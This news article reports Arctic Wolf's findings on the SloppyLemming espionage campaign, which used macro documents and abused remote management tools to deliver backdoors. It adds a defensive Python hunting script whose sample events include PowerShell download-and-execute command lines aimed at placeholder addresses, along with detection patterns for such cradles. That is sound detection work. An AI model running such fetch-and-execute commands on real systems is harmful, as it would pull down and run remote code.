A cyber threat group known as SloppyLemming has been linked to a new campaign targeting government bodies and critical infrastructure operators in Pakistan and Bangladesh. According to cybersecurity firm Arctic Wolf, the activity occurred between January 2025 and January 2026. The attackers employed two separate infection chains to deploy malware identified as BurrowShell and a Rust-based backdoor.
Attack Methodology and Malware Details
The operation utilized two distinct attack chains to compromise targets. The first chain involved the use of malicious Microsoft Office documents. These documents contained macros designed to download and execute a payload from a remote server.
The second chain abused a legitimate remote management tool. Attackers used this tool to run a PowerShell script, which then fetched and executed the final malware stage. Having two delivery methods increased the likelihood of a successful infection.
The primary malware delivered is tracked as BurrowShell. This is a sophisticated backdoor that provides attackers with persistent access to compromised systems. It can execute commands, upload and download files, and perform reconnaissance.
In parallel, the group deployed a separate backdoor written in the Rust programming language. Rust-based malware is increasingly popular among threat actors because of its performance and because its compiled binaries are harder for security tools to analyze. This backdoor provides similar remote control capabilities.
Targets and Geographic Focus
The campaign specifically focused on government entities in Pakistan and Bangladesh. While the exact agencies were not named, the targeting suggests an interest in governmental data and operations.
Critical infrastructure operators in these countries were also identified as targets. Such infrastructure includes sectors like energy, telecommunications, and transportation, where disruptions could have significant national consequences.
The concentrated focus on South Asia indicates a clear geopolitical dimension to the espionage activity. The intent appears to be intelligence gathering and maintaining a foothold within sensitive networks.
Attribution and Group Profile
The activity has been attributed to the threat cluster tracked as SloppyLemming. This group is not widely reported but demonstrates a moderate level of technical sophistication.
Their use of dual delivery methods and malware written in multiple programming languages points to a capable and resourceful operation. The choice of targets aligns with common cyber-espionage objectives.
Arctic Wolf’s report did not attribute the group to a specific nation-state. However, the pattern of targeting government and infrastructure in two neighboring countries is consistent with state-sponsored cyber espionage campaigns.
Security Implications and Response
The discovery of this campaign highlights the ongoing digital threats faced by government institutions worldwide. It underscores the need for robust cybersecurity defenses, particularly in regions of strategic interest.
Security analysts recommend several defensive measures. These include disabling Office macros by default, closely monitoring the use of remote management tools, and implementing application allowlisting.
Network defenders are also advised to hunt for indicators of compromise associated with BurrowShell and the Rust-based backdoor. Early detection is crucial to limiting the damage from such intrusions.
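Both delivery chains described above, an Office document whose macro launches a downloader and a remote management agent that runs a PowerShell fetch-and-execute script, leave the same footprint in process-creation telemetry: a scripting host spawned by an unusual parent, often with a download cradle on the command line. The following is an added example of hunting for that footprint; it is not code from Arctic Wolf or from the report. The events are constructed Sysmon-style records flattened to key=value pairs, the remote management agent names are hypothetical placeholders to be replaced with the agents actually deployed in your environment, and the 203.0.113.x addresses are documentation-range values.

```python
import re
from dataclasses import dataclass

# Office binaries: a scripting host spawned by one of these is the macro chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Hypothetical agent names; substitute the remote management agents used in your estate.
RMM_PARENTS = {"rmm_agent.exe", "remote_support_service.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments typical of a PowerShell download-and-execute stage.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"net\.webclient", r"downloadstring", r"downloadfile", r"invoke-webrequest",
    r"\biwr\b", r"invoke-expression", r"\biex\b", r"-enc(odedcommand)?\b",
    r"-w(indowstyle)?\s+hidden", r"frombase64string",
)]

# Constructed process-creation events (Sysmon Event ID 1 style, flattened to key=value).
SAMPLE_EVENTS = [
    r"""ts=2026-01-12T09:14:03Z host=PK-GOV-WS07 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -enc QQBCAEMA" user=pkgov\analyst1""",
    r"""ts=2026-01-12T09:20:41Z host=BD-INFRA-SRV02 parent="C:\Program Files\RMM\rmm_agent.exe" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2')" user=SYSTEM""",
    r"""ts=2026-01-12T10:02:17Z host=BD-INFRA-SRV02 parent="C:\Program Files\RMM\rmm_agent.exe" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe Get-Service -Name Spooler" user=SYSTEM""",
    r"""ts=2026-01-12T10:15:55Z host=PK-GOV-WS07 parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell Get-Process" user=pkgov\analyst1""",
    r"""ts=2026-01-12T11:40:08Z host=PK-GOV-WS09 parent=C:\Windows\System32\svchost.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -c 'iwr http://203.0.113.10/a.ps1 | iex'" user=SYSTEM""",
]


@dataclass
class Finding:
    ts: str
    host: str
    severity: str
    reason: str
    cmdline: str


def parse_event(line: str) -> dict:
    """Split a flattened key=value event; double-quoted values may contain spaces."""
    out = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|(\S+))', line):
        out[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: dict):
    """Score one event; returns a Finding or None when nothing stands out."""
    parent = basename(event.get("parent", ""))
    image = basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    if image not in SHELLS:
        return None
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"Office process {parent} spawned {image} (macro delivery chain)")
    if parent in RMM_PARENTS:
        reasons.append(f"remote management agent {parent} spawned {image} (RMM delivery chain)")
    if hits:
        reasons.append("download/execute indicators in command line: " + ", ".join(hits))
    if not reasons:
        return None
    # Office-launched shells are always worth a ticket; an RMM-launched shell is
    # high only when it also carries a cradle, otherwise it is baselined as medium.
    if parent in OFFICE_PARENTS or (parent in RMM_PARENTS and hits):
        severity = "high"
    elif parent in RMM_PARENTS or len(hits) >= 2:
        severity = "medium"
    else:
        severity = "low"
    return Finding(event.get("ts", "?"), event.get("host", "?"), severity, "; ".join(reasons), cmdline)


def hunt(lines):
    """Run the assessment over an iterable of raw event lines."""
    return [f for f in (assess(parse_event(line)) for line in lines) if f is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity.upper():6}] {f.ts} {f.host}: {f.reason}")
```

The third sample event shows why the RMM parent is scored rather than blocked outright: administrators legitimately run PowerShell through these agents, so the useful signal is the combination of an RMM parent with a download cradle, while plain RMM-launched commands are recorded at medium for baselining. In production the event source would be the SIEM query or Sysmon forwarder rather than an inline list, and the parent sets should be generated from the software inventory rather than typed by hand.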
Future Outlook and Investigation
Cybersecurity firms and national computer emergency response teams (CERTs) in the affected regions are expected to continue their investigation. Further technical indicators of compromise are likely to be published to aid the wider security community.
The SloppyLemming group is anticipated to continue its operations, potentially refining its tools and expanding its target list. Ongoing vigilance and international information sharing will be key to mitigating the threat posed by this and similar advanced persistent threat (APT) groups.
Source: Arctic Wolf